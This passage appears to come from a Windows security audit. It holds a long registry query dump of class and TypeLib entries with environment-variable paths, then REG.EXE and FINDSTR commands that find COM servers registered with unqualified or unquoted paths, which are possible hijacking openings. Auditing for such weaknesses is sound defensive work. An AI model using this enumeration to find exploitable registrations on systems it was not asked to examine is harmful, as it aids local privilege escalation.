%SYSTEMROOT%\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{54AF9343-1923-11D3-9CA4-00C04F72C514}\2.32\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{57DACAE6-5313-4E27-B109-E6E3D415730C}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\GenValObj.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{57DACAE6-5313-4E27-B109-E6E3D415730C}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5C65924B-E236-11D2-8899-00104B2AFB46}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F099F16-6A6E-4BBC-8BD8-98F3221D58C4}\1.0\HELPDIR (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{662901FC-6951-4854-9EB2-D9A2570F2B2E}\5.1\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\winhttpcom.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{662901FC-6951-4854-9EB2-D9A2570F2B2E}\5.1\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{680C64B0-8DA2-4399-BF4B-E94C1E52983E}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe\4 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{680C64B0-8DA2-4399-BF4B-E94C1E52983E}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe\4 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{680C64B0-8DA2-4399-BF4B-E94C1E52983E}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{6CAAAA3B-6502-40FE-97FC-72A290DC63CF}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\corrEngine.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{6CAAAA3B-6502-40FE-97FC-72A290DC63CF}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{6EC6C744-355F-11D3-8470-00C04F79DBC0}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\System32\mswmdm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{6EC6C744-355F-11D3-8470-00C04F79DBC0}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{728ab348-217d-11da-b2a4-000e7bbb2b09}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{728ab348-217d-11da-b2a4-000e7bbb2b09}\1.0\HELPDIR (Default) REG_EXPAND_SZ %systemroot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{7444C709-39BF-11D1-8CD9-00C04FC29D45}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cryptext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{7444C709-39BF-11D1-8CD9-00C04FC29D45}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{7586B340-EC08-11D0-A466-00C04FC30DF6}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\oleprn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{773F1B9A-35B9-4E95-83A0-A210F2DE3B37}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wisp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{773F1B9A-35B9-4E95-83A0-A210F2DE3B37}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wisp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{773F1B9A-35B9-4E95-83A0-A210F2DE3B37}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\System32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{777BA810-2498-4875-933A-3067DE883070}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{777BA810-2498-4875-933A-3067DE883070}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{777BA810-2498-4875-933A-3067DE883070}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{777BA8F1-2498-4875-933A-3067DE883070}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwreg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{777BA8F1-2498-4875-933A-3067DE883070}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwreg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{777BA8F1-2498-4875-933A-3067DE883070}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{7988B57C-EC89-11cf-9C00-00AA00A14F56}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dskquota.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{7CDB4C42-D09D-4532-AF9D-B941DF2F3E24}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cttunesvr.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{85ab206a-be8c-4b5a-ab0e-5eaaa13e541d}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cellularapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{87D5F036-FAC3-4390-A1E8-DFA8A62C09E7}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SysFxUI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{87D5F036-FAC3-4390-A1E8-DFA8A62C09E7}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\System32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{8E80422B-CAC4-472B-B272-9635F1DFEF3B}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{8E80422B-CAC4-472B-B272-9635F1DFEF3B}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{8E80422B-CAC4-472B-B272-9635F1DFEF3B}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{94A0E92D-43C0-494E-AC29-FD45948A5221}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wiaaut.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{94F6FF32-37C3-11D2-8840-00104B2AFB46}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{97d25db0-0363-11cf-abc4-02608c9e7553}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.tlb HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{9E175B60-F52A-11D8-B9A5-505054503030}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{9E175B60-F52A-11D8-B9A5-505054503030}\1.0\HELPDIR (Default) REG_EXPAND_SZ %systemroot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{9E175B61-F52A-11D8-B9A5-505054503030}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssitlb.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{9E175B61-F52A-11D8-B9A5-505054503030}\1.0\HELPDIR (Default) REG_EXPAND_SZ %systemroot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A1B0DE63-7454-4184-B5B6-6ACFDAC5C9A6}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\pmcsnap.dll\1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A1B9E03C-3226-11D2-883E-00104B2AFB46}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A47EDEDD-2921-4E5A-9B91-13C953EC7FE3}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\wkspbrokerAx.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{AEB84C80-95DC-11D0-B7FC-B61140119C4A}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmview.ocx HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B9C76E7B-D029-44EB-896F-F02FC6E9ABD5}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\firewallcontrolpanel.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B9C76E7B-D029-44EB-896F-F02FC6E9ABD5}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{C0653E9C-DB3B-4E9E-B3AB-B8E1DF53972F}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\wkspbroker.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{C0653E9C-DB3B-4E9E-B3AB-B8E1DF53972F}\1.0\HELPDIR (Default) REG_SZ %systemroot%\system32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{C866CA3A-32F7-11D2-9602-00C04F8EE628}\5.4\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{C866CA3A-32F7-11D2-9602-00C04F8EE628}\5.4\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{CB72A544-F75E-42CB-932E-EB06A7063A66}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{CD000000-8B95-11D1-82DB-00C04FB1625D}\1.0\HELPDIR (Default) REG_EXPAND_SZ %systemroot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{d0b7e02b-e1a3-11dc-81ff-001185ae5e76}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\diagcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{D597DEED-5B9F-11D1-8DD2-00AA004ABD5E}\2.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sens.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{D597DEED-5B9F-11D1-8DD2-00AA004ABD5E}\2.0\HELPDIR (Default) REG_SZ %SystemRoot%\System32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{D76EE74A-FBCF-4032-8597-C4763F1DB068}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cellularapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{D808BD12-DD1E-4cbc-8A3A-0A35010F078A}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{D808BD12-DD1E-4cbc-8A3A-0A35010F078A}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{DCB00D01-570F-4A9B-8D69-199FDBA5723B}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netprofm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{DCB00D01-570F-4A9B-8D69-199FDBA5723B}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netprofm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{DCB00D01-570F-4A9B-8D69-199FDBA5723B}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{DCBBBAB6-0001-4BBB-AAEE-338E368AF6FA}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wwanapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{DCBBBAB6-0001-4BBB-AAEE-338E368AF6FA}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{dfdfb4eb-32b7-4b7f-a3d4-f798f75d3a46}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{E6DA930B-BBA5-44DF-AC6F-FE60C1EDDEC8}\5.4\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{E6DA930B-BBA5-44DF-AC6F-FE60C1EDDEC8}\5.4\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR (Default) REG_SZ %systemroot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F31091E5-B0A8-11D6-B6FC-005056C00008}\2.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\AdvancedInstallers\cmiv2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F31091E5-B0A8-11D6-B6FC-005056C00008}\2.0\0\win64 (Default) REG_EXPAND_SZ %systemroot%\system32\AdvancedInstallers\cmiv2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F31091E5-B0A8-11D6-B6FC-005056C00008}\2.0\HELPDIR (Default) REG_EXPAND_SZ %systemroot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{FCDECE01-A39D-11D0-ABE7-00AA0064D470}\1.0\HELPDIR (Default) REG_EXPAND_SZ %systemroot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Undecided\shell\open (Default) REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-5381 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Undecided\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\shell\Open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\shell\openas (Default) REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-5376 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\shell\openas\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\shell\OpenWithSetDefaultOn\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe -override "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\wshext.dll,-4803 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\WScript.exe,2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Edit\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\WScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Open2 MUIVerb REG_EXPAND_SZ @%SystemRoot%\System32\wshext.dll,-4511 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Open2\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\CScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Print\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\wshext.dll,-4802 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\WScript.exe,2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Edit\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\WScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open2 MUIVerb REG_EXPAND_SZ @%SystemRoot%\System32\wshext.dll,-4511 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open2\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\CScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Print\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wbcatfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\sdclt.exe,-2111 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wbcatfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\sdclt.exe,-5500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wbcatfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\sdclt.exe /restorepage HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wdpfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\wmphoto.dll,-500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wdpfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\wmphoto.dll,-400 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wdpfile\shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wdpfile\shell\printto\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\webpnpFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\wpnpinst.exe,-50 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\webpnpFile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\oleprn.dll,-200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\webpnpFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\wpnpinst.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.CompositeFont\shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.IsoFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-30602 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.IsoFile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-5205 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.IsoFile\shell\burn MUIVerb REG_EXPAND_SZ @%SystemRoot%\System32\isoburn.exe,-351 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.IsoFile\shell\burn\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\isoburn.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.IsoFile\shell\mount\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.VhdFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-31475 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.VhdFile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.VhdFile\shell\mount\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.VhdPmemFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-31475 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.VhdPmemFile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\setupapi.dll,-54 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.XamlDocument\shell\edit\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.Xbap\shell\edit\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WindowsBackupFolderOptions\shell\openDesktopIni (Default) REG_SZ @%SystemRoot%\system32\sdclt.exe,-6051 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WindowsBackupFolderOptions\shell\openDesktopIni\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\sdclt.exe /FOLDEROPTIONS %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WindowsStore.License FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\licensemanagershellext.exe,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WindowsStore.License\shell\open MUIVerb REG_EXPAND_SZ @%SystemRoot%\System32\licensemanagershellext.exe,-102 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WindowsStore.License\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\licensemanagershellext.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wmffile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe,-3 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wmffile\shell\open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wmffile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wmffile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WPDContextMenu.Url\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\ieframe.dll",OpenURL %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\wshext.dll,-4801 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\WScript.exe,2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Edit\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\WScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Open2 MUIVerb REG_EXPAND_SZ @%SystemRoot%\System32\wshext.dll,-4511 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Open2\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\CScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Print\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSHFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\wshext.dll,-4800 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSHFile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\WScript.exe,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSHFile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\WScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSHFile\Shell\Open2 MUIVerb REG_EXPAND_SZ @%SystemRoot%\System32\wshext.dll,-4511 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSHFile\Shell\Open2\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\CScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xhtmlfile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xhtmlfile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xmlfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\msxml3r.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xslfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\msxml3r.dll,-2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xslfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\appmgr.dll,-218 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\zapfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\zapfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\zapfile\shell\printto\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4" End of search: 4844 match(es) found.
COM classes registered with an unqualified filename or a pathname containing an environment variable:
( REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "InProcHandler" /K /S /VE REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "InProcHandler32" /K /S /VE REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "InProcServer" /K /S /VE REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "InProcServer32" /K /S /VE ) | FINDSTR.EXE /B /C:" (Default) REG_" 1>"%TMP%\Sloppy.tmp" FINDSTR.EXE /V "\\" "%TMP%\Sloppy.tmp" FINDSTR.EXE "%" "%TMP%\Sloppy.tmp"
COM servers
registered with an unquoted long
pathname containing a space:
